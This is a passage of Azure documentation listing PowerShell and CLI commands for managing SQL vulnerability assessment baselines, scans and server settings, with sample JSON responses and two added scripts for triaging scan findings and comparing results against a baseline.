and Retry-After headers); read the scan record or its results afterwards with the Get
commands above.
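The invoke, get-scan and get-scan-results commands are normally chained: start a scan, wait for it, then look at what failed. The following script is an added example and is not part of the wrapper module or this article. It assumes the Az PowerShell module is installed and Connect-AzAccount has been run, that SqlVulnerabilityAssessmentCommands.psm1 is in the current directory, that a running scan reports "state": "InProgress" (the article only shows the terminal value "Passed"), and that a failed rule carries "status": "Finding" (the article only shows "NonFinding"). The functions Wait-SqlVaScan and Get-SqlVaFindings are this example's own names.

```powershell
# Added example: run a scan, wait for it, and triage the results.
# Not part of the wrapper module or the article; see the assumptions in the lead-in.
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1

$target = @{
    SubscriptionId    = '00000000-1111-2222-3333-444444444444'
    ResourceGroupName = 'vulnerabilityaseessmenttestRg'
    ServerName        = 'vulnerabilityaseessmenttest'
    DatabaseName      = 'db'
}

function Wait-SqlVaScan {
    # Polls the latest scan record until its state is no longer 'InProgress'
    # (assumed in-flight value) or the timeout elapses.
    param([hashtable] $Target, [int] $TimeoutSeconds = 600)
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        Start-Sleep -Seconds 15
        $resp = Get-SqlVulnerabilityAssessmentScans @Target -ScanId latest
        if ($resp.StatusCode -ne 200) {
            throw "Get scan failed: HTTP $($resp.StatusCode) $($resp.Content)"
        }
        $scan = ($resp.Content | ConvertFrom-Json).properties
        if ((Get-Date) -gt $deadline) {
            throw "Scan $($scan.scanId) still '$($scan.state)' after $TimeoutSeconds s"
        }
    } while ($scan.state -eq 'InProgress')
    return $scan
}

function Get-SqlVaFindings {
    # Flattens the 'value' array of a scan-results response into one row per failed
    # rule, ordered High > Medium > Low, noting whether a baseline already exists.
    param([object[]] $ScanResults)
    $rank = @{ High = 0; Medium = 1; Low = 2 }
    $ScanResults |
        Where-Object { $_.properties.status -eq 'Finding' } |
        ForEach-Object {
            [pscustomobject]@{
                RuleId      = $_.properties.ruleId
                Severity    = $_.properties.ruleMetadata.severity
                Category    = $_.properties.ruleMetadata.category
                Rows        = @($_.properties.queryResults).Count
                HasBaseline = $null -ne $_.properties.baselineAdjustedResult
                Title       = $_.properties.ruleMetadata.title
            }
        } |
        Sort-Object { $rank[$_.Severity] }, RuleId
}

# 1. Start an on-demand scan; the service answers 202 and runs it asynchronously.
$start = Invoke-SqlVulnerabilityAssessmentScan @target
if ($start.StatusCode -ne 202) {
    throw "Scan request failed: HTTP $($start.StatusCode) $($start.Content)"
}

# 2. Block until the scan finishes and report the counters the scan record carries.
$scan = Wait-SqlVaScan -Target $target
Write-Output ("Scan {0}: state={1}, failed={2}/{3}, baselineApplied={4}" -f $scan.scanId, $scan.state, $scan.totalFailedRulesCount, $scan.totalRulesCount, $scan.isBaselineApplied)

# 3. Pull every rule result of that scan and keep only the findings.
$resp = Get-SqlVulnerabilityAssessmentScanResults @target -ScanId latest
if ($resp.StatusCode -ne 200) {
    throw "Get scan results failed: HTTP $($resp.StatusCode) $($resp.Content)"
}
$findings = Get-SqlVaFindings -ScanResults ($resp.Content | ConvertFrom-Json).value
$findings | Format-Table RuleId, Severity, Category, Rows, HasBaseline, Title -AutoSize

# 4. Gate on High findings (non-zero exit for a pipeline); Medium/Low stay review items.
if ($findings | Where-Object { $_.Severity -eq 'High' }) { exit 1 }
```

Every wrapper command returns the raw Invoke-AzRestMethod response, which is why the script checks StatusCode before parsing Content; a 4xx from a typo in a resource name would otherwise surface as a confusing ConvertFrom-Json error.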


Get SQL vulnerability assessment server setting


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"properties":{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}


Set SQL vulnerability assessment server setting

Example 1:


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 'Enabled'


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : PUT
Content    : {"properties":{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}


Example 2:

Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 'Disabled'


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : PUT
Content    : {"properties":{"state":"Disabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}


Remove SQL vulnerability assessment server setting


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Remove-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest


Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-deletes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : DELETE
Content    :


Next steps 


Find and remediate vulnerabilities in your Azure SQL databases 


Express configuration Azure Command Line Interface (CLI) commands reference


Article • 06/28/2023


This article lists the Azure Command Line Interface (CLI) commands that can be used
with SQL vulnerability assessment express configuration.


• Set SQL vulnerability assessment baseline on system database

• Get SQL vulnerability assessment baseline on system database

• Set SQL vulnerability assessment baseline on user database

• Get SQL vulnerability assessment baseline on user database

• Set SQL vulnerability assessment baseline rule on system database

• Get SQL vulnerability assessment baseline rule on system database

• Remove SQL vulnerability assessment baseline rule on system database

• Set SQL vulnerability assessment baseline rule on user database

• Get SQL vulnerability assessment baseline rule on user database

• Remove SQL vulnerability assessment baseline rule on user database

• Get SQL vulnerability assessment scan results on system database

• Get SQL vulnerability assessment scan results on user database

• Get SQL vulnerability assessment scans on system database

• Get SQL vulnerability assessment scans on user database

• Invoke SQL vulnerability assessment scan on system database

• Invoke SQL vulnerability assessment scan on user database

• Get SQL vulnerability assessment server setting

• Set SQL vulnerability assessment server setting

• Remove SQL vulnerability assessment server setting


Note

For Azure CLI reference for the classic configuration, see Manage findings in your
Azure SQL databases.


Set SQL vulnerability assessment baseline on system database


Example 1:


Azure CLI


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master --body '{ "properties": { "latestScan": true, "results": {} } }'

A system database is addressed through the --uri-parameters systemDatabaseName
value; the URI itself stays at server scope.

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA2060": [
        [
          "False"
        ]
      ],
      "VA2061": [
        [
          "True"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
}

Example 2:

Azure CLI


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master --body '{\"properties\": { \"latestScan\": false, \"results\": {\"VA2063\": [[\"AllowAll\",\"0.0.0.0\",\"255.255.255.255\"]]}}}'

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA2063": [
        [
          "AllowAll",
          "0.0.0.0",
          "255.255.255.255"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
}


Get SQL vulnerability assessment baseline on system database


Example 1:


Azure CLI


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/master/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA2060": [
        [
          "False"
        ]
      ],
      "VA2061": [
        [
          "True"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}


Example 2:


Azure CLI


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/Default",
      "name": "Default",
      "properties": {
        "results": {
          "VA2060": [
            [
              "False"
            ]
          ],
          "VA2061": [
            [
              "True"
            ]
          ]
        }
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
    }
  ]
}


Set SQL vulnerability assessment baseline on user database


Example 1:


Azure CLI


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview --body '{ "properties": { "latestScan": true, "results": {} } }'

For a user database the database name is a path segment (/databases/db/) and no
--uri-parameters value is needed.

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA1143": [
        [
          "True"
        ]
      ],
      "VA1219": [
        [
          "False"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}


Example 2:


Azure CLI


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview --body '{\"properties\": { \"latestScan\": false, \"results\": {\"VA2062\": [[\"AllowAll\",\"0.0.0.0\",\"255.255.255.255\"]]}}}'

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA2062": [
        [
          "AllowAll",
          "0.0.0.0",
          "255.255.255.255"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}


Get SQL vulnerability assessment baseline on user database


Example 1:


Azure CLI


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default",
  "name": "Default",
  "properties": {
    "results": {
      "VA1143": [
        [
          "True"
        ]
      ],
      "VA1219": [
        [
          "False"
        ]
      ]
    }
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}


Example 2:


Azure CLI


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines?api-version=2022-02-01-preview

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default",
      "name": "Default",
      "properties": {
        "results": {
          "VA1143": [
            [
              "True"
            ]
          ],
          "VA1219": [
            [
              "False"
            ]
          ]
        }
      },
      "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
    }
  ]
}


Set SQL vulnerability assessment baseline rule on system database


Azure CLI


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master --body '{ \"properties\": { \"latestScan\": false, \"results\": [ [ \"AllowAll\", \"0.0.0.0\", \"255.255.255.255\" ] ] } }'

($RuleId stands for the rule being baselined; the response below is for VA2065.)

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2065",
  "name": "VA2065",
  "properties": {
    "results": [
      [
        "AllowAll",
        "0.0.0.0",
        "255.255.255.255"
      ]
    ]
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
}


Get SQL vulnerability assessment baseline rule on system database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2065",
  "name": "VA2065",
  "properties": {
    "results": [
      [
        "AllowAll",
        "0.0.0.0",
        "255.255.255.255"
      ]
    ]
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default/rules?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2060",
      "name": "VA2060",
      "properties": {
        "results": [
          [
            "False"
          ]
        ]
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2061",
      "name": "VA2061",
      "properties": {
        "results": [
          [
            "True"
          ]
        ]
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2065",
      "name": "VA2065",
      "properties": {
        "results": [
          [
            "AllowAll",
            "0.0.0.0",
            "255.255.255.255"
          ]
        ]
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"
    }
  ]
}

Remove SQL vulnerability assessment baseline rule on system database

Azure CLI

az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master


Set SQL vulnerability assessment baseline rule on user database

Azure CLI

az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview --body '{ \"properties\": { \"latestScan\": false, \"results\": [ [ \"AllowAll\", \"0.0.0.0\", \"255.255.255.255\" ] ] } }'

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062",
  "name": "VA2062",
  "properties": {
    "results": [
      [
        "AllowAll",
        "0.0.0.0",
        "255.255.255.255"
      ]
    ]
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}


Get SQL vulnerability assessment baseline rule on user database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062",
  "name": "VA2062",
  "properties": {
    "results": [
      [
        "AllowAll",
        "0.0.0.0",
        "255.255.255.255"
      ]
    ]
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default/rules?api-version=2022-02-01-preview

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1143",
      "name": "VA1143",
      "properties": {
        "results": [
          [
            "True"
          ]
        ]
      },
      "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1219",
      "name": "VA1219",
      "properties": {
        "results": [
          [
            "False"
          ]
        ]
      },
      "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"
    }
  ]
}


Remove SQL vulnerability assessment baseline rule on user database

Azure CLI

az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId?api-version=2022-02-01-preview
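The baseline-rule endpoints above take a list of result rows per rule, and the scan-result responses later on this page report a baselineAdjustedResult with resultsNotInBaseline and resultsOnlyInBaseline. The following Python is an added example, not code from this documentation page or from Defender for Cloud: it shows the row-level comparison those fields imply and builds the request body that the PUT baseline-rule call expects. The status rule (any row that differs in either direction makes the adjusted status a Finding) is this example's assumption, chosen to match the VA2062 scan-result response shown below; the sample rows are constructed.

```python
"""Baseline handling for SQL vulnerability assessment rules.

Added example; not code from the Defender for Cloud page or the service.
It works on the row lists used by the baselines/default/rules/{ruleId}
endpoint ("results": [[col, col, ...], ...]) and reproduces the comparison
implied by the scan-result fields resultsNotInBaseline and
resultsOnlyInBaseline. The status rule below is an assumption of this
example, chosen to match the VA2062 response shown on the page.
"""
import json
from typing import Any, Dict, List

Row = List[str]


def compare_with_baseline(current: List[Row], baseline: List[Row]) -> Dict[str, Any]:
    """Return the baseline-adjusted view of one rule's result rows.

    Rows are compared as whole tuples: a row counts as "in the baseline"
    only if every column matches, so changing one address of a firewall
    rule makes it a new row rather than a matched one.
    """
    baseline_set = {tuple(r) for r in baseline}
    current_set = {tuple(r) for r in current}
    not_in_baseline = [list(r) for r in current if tuple(r) not in baseline_set]
    only_in_baseline = [list(r) for r in baseline if tuple(r) not in current_set]
    # Assumption: any difference in either direction is a Finding, so a
    # baselined row that disappears is surfaced as well (the page's VA2062
    # response reports exactly that case with status "Finding").
    status = "Finding" if not_in_baseline or only_in_baseline else "NonFinding"
    return {
        "resultsNotInBaseline": not_in_baseline,
        "resultsOnlyInBaseline": only_in_baseline,
        "status": status,
    }


def baseline_rule_body(rows: List[Row]) -> Dict[str, Any]:
    """Build the request body for PUT .../baselines/default/rules/{ruleId}.

    Same shape as the --body shown on the page: latestScan false and an
    explicit list of rows. Rows are de-duplicated with order preserved, so
    a scan that returns the same rule twice does not double it.
    """
    seen = set()
    unique: List[Row] = []
    for row in rows:
        key = tuple(row)
        if key not in seen:
            seen.add(key)
            unique.append(list(row))
    return {"properties": {"latestScan": False, "results": unique}}


def main() -> None:
    # Constructed sample: a database-level firewall rule (VA2062 columns)
    # was baselined, then removed, and a new narrower rule appeared.
    baseline = [["AllowAll", "0.0.0.0", "255.255.255.255"]]
    current = [["OfficeRange", "203.0.113.10", "203.0.113.20"]]
    print(json.dumps(compare_with_baseline(current, baseline), indent=2))
    # Body that would baseline the current rows instead (what the PUT sends).
    print(json.dumps(baseline_rule_body(current + current)))


if __name__ == "__main__":
    main()
```

Feed `compare_with_baseline` the rule's queryResults from a scan-results response and the expectedResults from its baseline to reproduce the service's adjusted view locally; feed `baseline_rule_body` the rows you have reviewed to produce the body for the PUT call.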


Get SQL vulnerability assessment scan results on system database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/scans/$ScanId/scanresults/$RuleId?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/VA2065/scanResults/VA2065",
  "name": "VA2065",
  "properties": {
    "baselineAdjustedResult": null,
    "errorMessage": null,
    "isTrimmed": false,
    "queryResults": [],
    "remediation": {
      "automated": false,
      "description": "Evaluate each of the server-level firewall rules. Remove any rules that grant unnecessary access and set the rest as a baseline. Deviations from the baseline will be identified and brought to your attention in subsequent scans.",
      "portalLink": "ReviewServerFirewallRules",
      "scripts": []
    },
    "ruleId": "VA2065",
    "ruleMetadata": {
      "benchmarkReferences": [],
      "category": "SurfaceAreaReduction",
      "description": "The Azure SQL server-level firewall helps protect your data by preventing all access to your databases until you specify which IP addresses have permission. Server-level firewall rules grant access to all databases that belong to the server based on the originating IP address of each request. \n\nServer-level firewall rules can be created and managed through Transact-SQL as well as through the Azure portal or PowerShell. For more details please see: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-firewall-configure.\n\nThis check enumerates all the server-level firewall rules so that any changes made to them can be identified and addressed.",
      "queryCheck": {
        "columnNames": [
          "Firewall Rule Name",
          "Start Address",
          "End Address"
        ],
        "expectedResult": [],
        "query": "SELECT name AS [Firewall Rule Name]\n    ,start_ip_address AS [Start Address]\n    ,end_ip_address AS [End Address]\nFROM sys.firewall_rules"
      },
      "rationale": "Firewall rules should be strictly configured to allow access only to client computers that have a valid need to connect to the database server. Any superfluous entries in the firewall may pose a threat by allowing an unauthorized source access to your databases.",
      "ruleId": "VA2065",
      "ruleType": "BaselineExpected",
      "severity": "High",
      "title": "Server-level firewall rules should be tracked and maintained at a strict minimum"
    },
    "status": "NonFinding"
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/scans/$ScanId/scanresults?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/VA1223/scanResults/VA1223",
      "name": "VA1223",
      "properties": {
        "baselineAdjustedResult": null,
        "errorMessage": null,
        "isTrimmed": false,
        "queryResults": [],
        "remediation": {
          "automated": false,
          "description": "Create new certificates, re-encrypt the data/sign-data using the new key, and drop the affected keys.",
          "portalLink": "",
          "scripts": []
        },
        "ruleId": "VA1223",
        "ruleMetadata": {
          "benchmarkReferences": [
            {
              "benchmark": "FedRAMP",
              "reference": null
            }
          ],
          "category": "DataProtection",
          "description": "Certificate keys are used in RSA and other encryption algorithms to protect data. These keys need to be of enough length to secure the user's data. This rule checks that the key's length is at least 2048 bits for all certificates.",
          "queryCheck": {
            "columnNames": [
              "Certificate Name",
              "Thumbprint"
            ],
            "expectedResult": [],
            "query": "SELECT name AS [Certificate Name], thumbprint AS [Thumbprint]\nFROM sys.certificates\nWHERE key_length < 2048"
          },
          "rationale": "Key length defines the upper-bound on the encryption algorithm's security. Using short keys in encryption algorithms may lead to weaknesses in data-at-rest protection.",
          "ruleId": "VA1223",
          "ruleType": "NegativeList",
          "severity": "High",
          "title": "Certificate keys should use at least 2048 bits"
        },
        "status": "NonFinding"
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/VA2060/scanResults/VA2060",
      "name": "VA2060",
      "properties": {
        "baselineAdjustedResult": {
          "baseline": {
            "expectedResults": [
              [
                "False"
              ]
            ],
            "updatedTime": "2023-05-15T12:36:39.9688256+00:00"
          },
          "resultsNotInBaseline": [],
          "resultsOnlyInBaseline": [],
          "status": "NonFinding"
        },
        "errorMessage": null,
        "isTrimmed": false,
        "queryResults": [],
        "remediation": {
          "automated": false,
          "description": "It is recommended to enable SQL Threat Detection at the server level so that all activities on the server itself and the databases that belong to it are protected.",
          "portalLink": "EnableAds",
          "scripts": []
        },
        "ruleId": "VA2060",
        "ruleMetadata": {
          "benchmarkReferences": [],
          "category": "DataProtection",
